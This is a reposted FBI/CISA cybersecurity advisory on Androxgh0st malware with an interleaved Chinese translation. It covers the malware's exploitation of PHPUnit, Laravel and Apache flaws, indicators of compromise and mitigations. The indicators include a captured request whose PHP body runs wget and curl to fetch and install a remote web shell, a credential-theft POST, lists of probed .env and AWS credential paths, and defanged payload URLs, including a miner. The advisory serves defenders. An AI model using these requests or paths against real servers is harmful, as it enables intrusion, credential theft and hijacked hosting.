Known Indicators of Compromise Associated with Androxgh0st Malware

SUMMARY 总结

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to disseminate known indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with threat actors deploying Androxgh0st malware. Multiple, ongoing investigations and trusted third party reporting yielded the IOCs and TTPs, and provided information on Androxgh0st malware’s ability to establish a botnet that can further identify and compromise vulnerable networks.
联邦调查局 （FBI） 和网络安全和基础设施安全局 （CISA） 正在发布此联合网络安全公告 （CSA），以传播与部署 Androxgh0st 恶意软件的威胁行为者相关的已知入侵指标 （IOC） 和战术、技术和程序 （TTP）。多项正在进行的调查和受信任的第三方报告产生了 IOC 和 TTP，并提供了有关 Androxgh0st 恶意软件建立僵尸网络的能力的信息，该僵尸网络可以进一步识别和破坏易受攻击的网络。

The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of cybersecurity incidents caused by Androxgh0st infections.
FBI 和 CISA 鼓励组织实施本 CSA 的“缓解”部分中的建议，以减少由 Androxgh0st 感染引起的网络安全事件的可能性和影响。

Download the PDF version of this report:
下载本报告的PDF版本：

AA24-016A Known Indicators of Compromise Associated with Androxgh0st Malware
AA24-016A 与 Androxgh0st 恶意软件相关的已知入侵指标(PDF, 576.40 KB )
（PDF格式，576.40 KB）

For a downloadable copy of IOCs, see:
有关 IOC 的可下载副本，请参阅：

AA24-016A STIX XML
AA24-016A STIX XML格式(XML, 45.81 KB )
（XML格式，45.81 KB ）

AA24-016A STIX JSON(JSON, 39.87 KB )
（JSON， 39.87 KB ）

TECHNICAL DETAILS 技术细节

Note: This advisory uses the MITRE ATT&CK^® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding mitigation and/or detection recommendations. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
注意：此通报使用 MITRE ATT&CK ^® for Enterprise 框架版本 14。请参阅 MITRE ATT&CK 策略和技术部分，了解映射到 MITRE ATT&CK 策略和技术的威胁参与者活动表，以及相应的缓解和/或检测建议。有关将恶意网络活动映射到 MITRE ATT&CK 框架的帮助，请参阅 CISA 和 MITRE ATT&CK 的 MITRE ATT&CK 映射最佳实践和 CISA 的决策器工具。

Overview 概述

Androxgh0st malware has been observed establishing a botnet [T1583.005] for victim identification and exploitation in target networks. According to open source reporting[1], Androxgh0st is a Python-scripted malware [T1059.006] primarily used to target .env files that contain confidential information, such as credentials [T1552.001] for various high profile applications (i.e., Amazon Web Services [AWS], Microsoft Office 365, SendGrid, and Twilio from the Laravel web application framework). Androxgh0st malware also supports numerous functions capable of abusing the Simple Mail Transfer Protocol (SMTP), such as scanning [T1046] and exploiting exposed credentials [T1078] and application programming interfaces (APIs) [T1114], and web shell deployment [T1505.003].
已观察到 Androxgh0st 恶意软件建立了一个僵尸网络 [T1583.005]，用于在目标网络中识别和利用受害者。根据开源报告[1]，Androxgh0st是一种Python脚本恶意软件[T1059.006]，主要用于针对包含机密信息的.env文件，例如各种知名应用程序（即Amazon Web Services [AWS]，Microsoft Office 365，SendGrid和Laravel Web应用程序框架中的Twilio）的凭据[T1552.001]。Androxgh0st 恶意软件还支持许多能够滥用简单邮件传输协议 （SMTP） 的功能，例如扫描 [T1046] 并利用暴露的凭据 [T1078] 和应用程序编程接口 （API） [T1114] 以及 Web Shell 部署 [T1505.003]。

Targeting the PHPUnit 以 PHPUnit 为目标

Androxgh0st malware TTPs commonly involves the use of scripts, conducting scanning [T1595] and searching for websites with specific vulnerabilities. In particular, threat actors deploying Androxgh0st have been observed exploiting CVE-2017-9841 to remotely run hypertext preprocessor (PHP) code on fallible websites via PHPUnit [T1190]. Websites using the PHPUnit module that have internet-accessible (exposed) /vendor folders are subject to malicious HTTP POST requests to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php uniform resource identifier (URI). This PHP page runs PHP code submitted through a POST request, which allows the threat actors to remotely execute code.
Androxgh0st 恶意软件 TTP 通常涉及使用脚本、执行扫描 [T1595] 和搜索具有特定漏洞的网站。特别是，已观察到部署 Androxgh0st 的威胁行为者利用 CVE-2017-9841 通过 PHPUnit [T1190] 在易犯错误的网站上远程运行超文本预处理器 （PHP） 代码。使用 PHPUnit 模块的网站，如果具有可通过 Internet 访问（公开）的文件夹，则会受到对 /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 统一资源标识符 （URI） /vendor 的恶意 HTTP POST 请求。此 PHP 页面运行通过 POST 请求提交的 PHP 代码，这允许威胁参与者远程执行代码。

Malicious actors likely use Androxgh0st to download malicious files [T1105] to the system hosting the website. Threat actors are further able to set up a fake (illegitimate) page accessible via the URI to provide backdoor access to the website. This allows threat actors to download additional malicious files for their operations and access databases.
恶意行为者可能使用 Androxgh0st 将恶意文件 [T1105] 下载到托管网站的系统。威胁行为者还可以进一步设置可通过 URI 访问的虚假（非法）页面，以提供对网站的后门访问。这允许威胁参与者下载其他恶意文件用于其操作并访问数据库。

Laravel Framework Targeting
Laravel 框架目标

Androxgh0st malware establishes a botnet to scan for websites using the Laravel web application framework. After identifying websites using the Laravel web application, threat actors attempt to determine if the domain’s root-level .env file is exposed and contains credentials for accessing additional services. Note: .env files commonly store credentials and tokens. Threat actors often target .env files to steal these credentials within the environment variables.
Androxgh0st 恶意软件建立了一个僵尸网络，使用 Laravel Web 应用程序框架扫描网站。在使用 Laravel Web 应用程序识别网站后，威胁参与者会尝试确定域的根级 .env 文件是否已公开并包含用于访问其他服务的凭据。注意： .env 文件通常存储凭据和令牌。威胁参与者通常以文件为目标，以 .env 在环境变量中窃取这些凭据。

If the .env file is exposed, threat actors will issue a GET request to the /.env URI to attempt to access the data on the page. Alternatively, Androxgh0st may issue a POST request to the same URI with a POST variable named 0x[] containing certain data sent to the web server. This data is frequently used as an identifier for the threat actor. This method appears to be used for websites in debug mode (i.e., when non-production websites are exposed to the internet). A successful response from either of these methods allows the threat actors to look for usernames, passwords, and/or other credentials pertaining to services such as email (via SMTP) and AWS accounts.
如果 .env 文件暴露，威胁参与者将向 /.env URI 发出 GET 请求，以尝试访问页面上的数据。或者，Androxgh0st 可以向同一 URI 发出 POST 请求，该 URI 具有一个名为 POST 的变量，该变量包含 0x[] 发送到 Web 服务器的某些数据。此数据经常用作威胁参与者的标识符。此方法似乎用于处于调试模式的网站（即，当非生产网站暴露在互联网上时）。如果通过这两种方法中的任何一种成功响应，威胁参与者就可以查找与电子邮件（通过 SMTP）和 AWS 账户等服务相关的用户名、密码和/或其他凭证。

Androxgh0st malware can also access the application key [TA0006] for the Laravel application on the website. If the threat actors successfully identify the Laravel application key, they will attempt exploitation by using the key to encrypt PHP code [T1027.010]. The encrypted code is then passed to the website as a value in the cross-site forgery request (XSRF) token cookie, XSRF-TOKEN, and included in a future GET request to the website. The vulnerability defined in CVE-2018-15133 indicates that on Laravel applications, XSRF token values are subject to an un-serialized call, which can allow for remote code execution. In doing so, the threat actors can upload files to the website via remote access.
Androxgh0st 恶意软件还可以访问网站上 Laravel 应用程序的应用程序密钥 [TA0006]。如果威胁参与者成功识别了 Laravel 应用程序密钥，他们将尝试使用该密钥加密 PHP 代码 [T1027.010] 进行利用。然后，加密代码将作为跨站点伪造请求 （XSRF） 令牌 cookie XSRF-TOKEN 中的值传递到网站，并包含在将来对网站的 GET 请求中。CVE-2018-15133 中定义的漏洞表明，在 Laravel 应用程序上，XSRF 令牌值受到未序列化调用的约束，这允许远程执行代码。这样，威胁行为者可以通过远程访问将文件上传到网站。

Apache Web Server Targeting
Apache Web 服务器目标

In correlation with CVE-2021-41773, Androxgh0st actors have been observed scanning vulnerable web servers [T1595.002] running Apache HTTP Server versions 2.4.49 or 2.4.50. Threat actors can identify uniform resource locators (URLs) for files outside root directory through a path traversal attack [T1083]. If these files are not protected by the “request all denied” configuration and Common Gateway Interface (CGI) scripts are enabled, this may allow for remote code execution.
与 CVE-2021-41773 相关，已观察到 Androxgh0stactors 扫描运行 Apache HTTP Server 版本 2.4.49 或 2.4.50 的易受攻击的 Web 服务器 [T1595.002]。威胁参与者可以通过路径遍历攻击 [T1083] 识别根目录之外文件的统一资源定位符 （URL）。如果这些文件不受“请求全部拒绝”配置的保护，并且启用了通用网关接口 （CGI） 脚本，则可能允许远程执行代码。

If threat actors obtain credentials for any services using the above methods, they may use these credentials to access sensitive data or use these services to conduct additional malicious operations. For example, when threat actors successfully identify and compromise AWS credentials from a vulnerable website, they have been observed attempting to create new users and user policies [T1136]. Additionally, Andoxgh0st actors have been observed creating new AWS instances to use for conducting additional scanning activity [T1583.006].
如果威胁参与者使用上述方法获取任何服务的凭据，他们可能会使用这些凭据访问敏感数据或使用这些服务进行其他恶意操作。例如，当威胁行为者成功识别并破坏来自易受攻击网站的 AWS 凭证时，已观察到他们试图创建新的用户和用户策略 [T1136]。此外，还观察到 Andoxgh0st 参与者创建新的 AWS 实例以用于执行其他扫描活动 [T1583.006]。

INDICATORS OF COMPROMISE (IOCs)
入侵指标 （IOC）

Based on investigations and analysis, the following requests are associated with Androxgh0st activity:
根据调查和分析，以下请求与 Androxgh0st 活动相关联：

• Incoming GET and POST requests to the following URIs:
  传入到以下 URI 的 GET 和 POST 请求：
  • /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /.env
• Incoming POST requests with the following strings:
  具有以下字符串的传入 POST 请求：
  • [0x%5B%5D=androxgh0st]
  • ImmutableMultiDict([(‘0x[]’, ‘androxgh0st’)])

In both previously listed POST request strings, the name androxgh0st has been observed to be replaced with other monikers.
在前面列出的两个 POST 请求字符串中，已观察到该名称 androxgh0st 已替换为其他名字对象。

Additional URIs observed by the FBI and a trusted third party used by these threat actors for credential exfiltration include:
FBI 和这些威胁参与者用于凭据外泄的受信任第三方观察到的其他 URI 包括：

• /info
• /phpinfo
• /phpinfo.php
• /?phpinfo=1
• /frontend_dev.php/$
• /_profiler/phpinfo
• /debug/default/view?panel=config
• /config.json
• /.json
• /.git/config
• /live_env
• /.env.dist
• /.env.save
• /environments/.env.production
• /.env.production.local
• /.env.project
• /.env.development
• /.env.production
• /.env.prod
• /.env.development.local
• /.env.old
• /<insert-directory>/.env
  • Note: the actor may attempt multiple different potential URI endpoints scanning for the .env file, for example /docker/.env or /local/.env.
    注意：参与者可能会尝试扫描 .env 多个不同的潜在 URI 端点以扫描文件，例如 /docker/.env or /local/.env .
• /.aws/credentials
• /aws/credentials
• /.aws/config
• /.git
• /.test
• /admin
• /backend
• /app
• /current
• /demo
• /api
• /backup
• /beta
• /cron
• /develop
• /Laravel
• /laravel/core
• /gists/cache
• /test.php
• /info.php
• //.env
• /admin-app/.env%20
• /laravel/.env%20
• /shared/.env%20
• /.env.project%20
• /apps/.env%20
• /development/.env%20
• /live_env%20
• /.env.development%20

Targeted URIs for web-shell drop:
web-shell 删除的目标 URI：

• /.env/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• //admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• //api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• //backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• //blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• //cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• //demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• //dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• //laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• //lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• //lib/phpunit/phpunit/Util/PHP/eval-stdin.php
• //lib/phpunit/src/Util/PHP/eval-stdin.php
• //lib/phpunit/Util/PHP/eval-stdin.php
• //new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• //old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• //panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• //phpunit/phpunit/src/Util/PHP/eval-stdin.php
• //phpunit/phpunit/Util/PHP/eval-stdin.php
• //phpunit/src/Util/PHP/eval-stdin.php
• //phpunit/Util/PHP/eval-stdin.php
• //protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• //sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/evalstdin.php
• //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• //vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
• //vendor/phpunit/src/Util/PHP/eval-stdin.php
• //vendor/phpunit/Util/PHP/eval-stdin.php
• //wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• //wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• //wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• //www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• /admin/ckeditor/plugins/ajaxplorer/phpunit/src/Util/PHP/eval-stdin.php
• /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• /api/vendor/phpunit/phpunit/src/Util/PHP/Template/eval-stdin.php
• /lab/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• /laravel_web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• /laravelao/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• /lib/phpunit/phpunit/Util/PHP/eval-stdin.php
• /lib/phpunit/phpunit/Util/PHP/eval
• stdin.php%20/lib/phpunit/src/Util/PHP/eval-stdin.php
• /lib/phpunit/src/Util/PHP/eval-stdin.php
• /lib/phpunit/Util/PHP/eval-stdin.php
• /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• /libraries/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• /phpunit/phpunit/src/Util/PHP/eval-stdin.php
• /phpunit/phpunit/Util/PHP/eval-stdin.php
• /phpunit/phpunit/Util/PHP/eval-stdin.php%20/phpunit/src/Util/PHP/evalstdin.php
• /phpunit/src/Util/PHP/eval-stdin.php
• ./phpunit/Util/PHP/eval-stdin.php
• /phpunit/Util/PHP/eval-stdin.php%20/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php.dev
• /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
• /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php%20/vendor/phpunit/src/Util/PHP/eval-stdin.php
• /vendor/phpunit/src/Util/PHP/eval-stdin.php
• /vendor/phpunit/Util/PHP/eval-stdin.php
• /vendor/phpunit/Util/PHP/eval-stdin.php%20
• /phpunit/phpunit/src/Util/PHP/eval-stdin.php
• /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
• /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

An example of attempted credential exfiltration through (honeypot) open proxies:
尝试通过（蜜罐）开放代理进行凭据外泄的示例：

POST /.aws/credentials HTTP/1.1
host: www.example.com
user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
accept-encoding: gzip, deflate
accept: */*
connection: keep-alive
content-length: 20
content-type: application/x-www-form-urlencoded

0x%5B%5D=androxgh0st

An example of attempted web-shell drop through (honeypot) open proxies:
尝试通过 web-shell（蜜罐）开放代理的示例：

GET http://www.example.com/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
host: www.example.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.76
accept-encoding: gzip, deflate
accept: */*
connection: keep-alive
x-forwarded-for: 200.172.238.135
content-length: 279

<?php file_put_contents(‘evil.php’,file_get_contents(‘hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt’)); system(‘wget hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt -O evil.php;curl hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt -O evil.php’); ?>
<？php file_put_contents（’邪恶.php’，file_get_contents（’hxxps：//mc.rockylinux[.]si/seoforce/triggers/files/evil.txt’））;system（’wget hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt -O evil.php;卷曲 hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt -O evil.php’）; ？>

Monikers used instead of Androxgh0st (0x%5B%5D=???):
使用名字对象代替 Androxgh0st （0x%5B%5D=???）：

• Ridho 里多
• Aws
• 0x_0x
• x_X
• nopebee7
• SMTPEX SMTPEX公司
• evileyes0 邪恶之眼0
• privangga 普里旺加
• drcrypter Drcrypter的
• errorcool
• drosteam 渣滓
• androxmen 雄性人
• crack3rz 裂纹3RZ
• b4bbyghost b4bbyghost的
• 0x0day 0x0天
• janc0xsec
• blackb0x 黑色B0X
• 0x1331day 0x1331天
• Graber 刨丝机

Example malware drops through eval-stdin.php:
恶意软件通过 eval-stdin.php 丢弃的示例：

hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt
59e90be75e51c86b4b9b69dcede2cf815da5a79f7e05cac27c95ec35294151f4

hxxps://chainventures.co[.]uk/.well-known/aas
dcf8f640dd7cc27d2399cce96b1cf4b75e3b9f2dfdf19cee0a170e5a6d2ce6b6

hxxp://download.asyncfox[.]xyz/download/xmrig.x86_64
23fc51fde90d98daee27499a7ff94065f7ed4ac09c22867ebd9199e025dee066

hxxps://pastebin[.]com/raw/zw0gAmpC
ca45a14d0e88e4aa408a6ac2ee3012bf9994b16b74e3c66b588c7eabaaec4d72

hxxp://raw.githubusercontent[.]com/0x5a455553/MARIJUANA/master/MARIJUANA.php
0df17ad20bf796ed549c240856ac2bf9ceb19f21a8cae2dbd7d99369ecd317ef

hxxp://45.95.147[.]236/tmp.x86_64
6b5846f32d8009e6b54743d6f817f0c3519be6f370a0917bf455d3d114820bbc

hxxp://main.dsn[.]ovh/dns/pwer
bb7070cbede294963328119d1145546c2e26709c5cea1d876d234b991682c0b7

hxxp://tangible-drink.surge[.]sh/configx.txt
de1114a09cbab5ae9c1011ddd11719f15087cc29c8303da2e71d861b0594a1ba

MITRE ATT&CK TACTICS AND TECHNIQUES
MITRE ATT&CK 战术和技术

See Tables 1-10 for all referenced threat actor tactics and techniques in this advisory.
请参阅表 1-10，了解此通报中所有引用的威胁参与者策略和技术。

Table 1: Reconnaissance 表1：侦察

Table 2: Resource Development
表2：资源开发

Table 3: Initial Access 表 3：初始访问

Table 4: Execution 表 4：执行

Table 5: Persistence 表 5：持久性

Table 6: Defense Evasion 表6：防御规避

Table 7: Credential Access
表 7：凭据访问

Table 8: Discovery 表 8：发现

Table 9: Collection 表 9：集合

Table 10: Command and Control
表 10：命令和控制

MITIGATIONS 缓解措施

The FBI and CISA recommend implementing the mitigations below to improve your organization’s cybersecurity posture based on Androxgh0st threat actor activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
FBI 和 CISA 建议实施以下缓解措施，以根据 Androxgh0st 威胁参与者活动改善组织的网络安全态势。这些缓解措施符合 CISA 和美国国家标准与技术研究院 （NIST） 制定的跨部门网络安全绩效目标 （CPG）。CPG 提供了 CISA 和 NIST 建议所有组织实施的最低限度的做法和保护措施。CISA 和 NIST 将 CPG 建立在现有的网络安全框架和指南之上，以防范最常见和最有影响力的威胁、策略、技术和程序。访问 CISA 的跨部门网络安全绩效目标，了解有关 CPG 的更多信息，包括其他建议的基线保护。

These mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufacturers incorporate secure by design principles and tactics into their software development practices, limiting the impact of actor techniques and strengthening their customers’ security posture. For more information on secure by design, see CISA’s Secure by Design webpage.
这些缓解措施适用于所有关键基础设施组织和网络防御者。FBI 和 CISA 建议软件制造商将安全设计原则和策略纳入其软件开发实践中，限制参与者技术的影响并加强客户的安全态势。有关安全设计的详细信息，请参阅 CISA 的 Secure by Design 网页。

The FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by actors using Androxgh0st malware.
FBI 和 CISA 建议网络防御者应用以下缓解措施，以限制对通用系统和网络发现技术的潜在对抗性使用，并降低使用 Androxgh0st 恶意软件的攻击者入侵的风险。

• Keep all operating systems, software, and firmware up to date. Specifically, ensure that Apache servers are not running versions 2.4.49 or 2.4.50. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems.
  使所有操作系统、软件和固件保持最新状态。具体而言，请确保 Apache 服务器未运行版本 2.4.49 或 2.4.50。及时打补丁是组织可以采取的最有效和最具成本效益的步骤之一，以最大程度地减少其遭受网络安全威胁的风险。优先修补面向互联网的系统中已知的被利用漏洞。
• Verify that the default configuration for all URIs is to deny all requests unless there is a specific need for it to be accessible.
  验证所有 URI 的默认配置是否为拒绝所有请求，除非有特定需要使其可访问。
• Ensure that any live Laravel applications are not in “debug” or testing mode. Remove all cloud credentials from .env files and revoke them. All cloud providers have safer ways to provide temporary, frequently rotated credentials to code running inside a web server without storing them in any file.
  确保任何实时的 Laravel 应用程序都未处于“调试”或测试模式。从 .env 文件中删除所有云凭据并撤销它们。所有云提供商都有更安全的方法来为 Web 服务器内运行的代码提供临时的、经常轮换的凭据，而无需将它们存储在任何文件中。
• On a one-time basis for previously stored cloud credentials, and on an on-going basis for other types of credentials that cannot be removed, review any platforms or services that have credentials listed in the .env file for unauthorized access or use.
  对于以前存储的云凭据，以及对于无法删除的其他类型的凭据，请持续检查 .env 文件中列出的凭据的任何平台或服务，以进行未经授权的访问或使用。
• Scan the server’s file system for unrecognized PHP files, particularly in the root directory or /vendor/phpunit/phpunit/src/Util/PHP folder.
  扫描服务器的文件系统以查找无法识别的 PHP 文件，尤其是在根目录或 /vendor/phpunit/phpunit/src/Util/PHP 文件夹中。
• Review outgoing GET requests (via cURL command) to file hosting sites such as GitHub, pastebin, etc., particularly when the request accesses a .php file.
  查看传出的 GET 请求（通过 cURL 命令）到文件托管站点（如 GitHub、pastebin 等），尤其是在请求访问 .php 文件时。

VALIDATE SECURITY CONTROLS
验证安全控制

In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
除了应用缓解措施外，FBI 和 CISA 还建议针对此通报中映射到 MITRE ATT&CK for Enterprise 框架的威胁行为执行、测试和验证组织的安全计划。创作机构建议测试现有的安全控制清单，以评估它们如何针对本通报中描述的 ATT&CK 技术执行。

To get started: 要开始使用，请执行以下操作：

1. Select an ATT&CK technique described in this advisory (see Tables 1-10).
   选择此公告中描述的 ATT&CK 技术（请参阅表 1-10）。
2. Align your security technologies against the technique.
   使您的安全技术与该技术保持一致。
3. Test your technologies against the technique.
   针对该技术测试您的技术。
4. Analyze your detection and prevention technologies’ performance.
   分析检测和预防技术的性能。
5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
   对所有安全技术重复该过程，以获得一组全面的性能数据。
6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.
   根据此过程生成的数据调整安全计划，包括人员、流程和技术。

FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
FBI 和 CISA 建议在生产环境中持续大规模测试您的安全计划，以确保针对本公告中确定的 MITRE ATT&CK 技术的最佳性能。

REPORTING 报告

The FBI encourages organizations to report information concerning suspicious or criminal activity to their local FBI field office. With regards to specific information that appears in this CSA, indicators should always be evaluated in light of an organization’s complete security situation.
联邦调查局鼓励组织向当地联邦调查局外地办事处报告有关可疑或犯罪活动的信息。对于本 CSA 中出现的具体信息，应始终根据组织的完整安全状况来评估指标。

When available, each report submitted should include the date, time, location, type of activity, number of people, and type of equipment used for the activity, the name of the submitting company or organization, and a designated point of contact. Reports can be submitted to the FBI Internet Crime Complaint Center (IC3), a local FBI Field Office, or to CISA via its Incident Reporting System or its 24/7 Operations Center at [email protected] or (888) 282-0870.
如果有，提交的每份报告都应包括日期、时间、地点、活动类型、人数和用于活动的设备类型、提交公司或组织的名称以及指定的联系人。报告可以提交给 FBI 互联网犯罪投诉中心 （IC3）、当地的 FBI 外地办事处，或通过其事件报告系统或其 24/7 运营中心（电话 [email protected] 或 （888） 282-0870 提交给 CISA。

RESOURCES 资源

• CISA: Known Exploited Vulnerabilities Catalog
  CISA：已知被利用的漏洞目录
• CISA, MITRE: Best Practices for MITRE ATT&CK Mapping
  CISA、MITRE：MITRE ATT 和 CK 映射的最佳实践
• CISA: Decider Tool CISA：决策程序工具
• NIST: CVE-2017-9841 NIST：CVE-2017-9841
• NIST: CVE-2018-15133 NIST：CVE-2018-15133
• NIST: CVE-2021-41773 NIST：CVE-2021-41773
• CISA: Cross-Sector Cybersecurity Performance Goals
  CISA：跨部门网络安全绩效目标
• CISA: Secure by Design
  CISA：安全设计

REFERENCES 引用

1. Fortinet – FortiGuard Labs: Threat Signal Report: AndroxGh0st Malware Actively Used in the Wild
   Fortinet – FortiGuard Labs：威胁信号报告：AndroxGh0st 恶意软件在野外被积极使用

ACKNOWLEDGEMENTS 确认

Amazon contributed to this CSA.
亚马逊为此 CSA 做出了贡献。

DISCLAIMER 免責聲明

The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and CISA.
本报告中的信息按“原样”提供，仅供参考。FBI 和 CISA 不认可任何商业实体、产品、公司或服务，包括本文档中链接的任何实体、产品或服务。任何通过服务标志、商标、制造商或其他方式对特定商业实体、产品、流程或服务的引用，均不构成或暗示 FBI 和 CISA 的认可、推荐或支持。

原文始发于CISA：Known Indicators of Compromise Associated with Androxgh0st Malware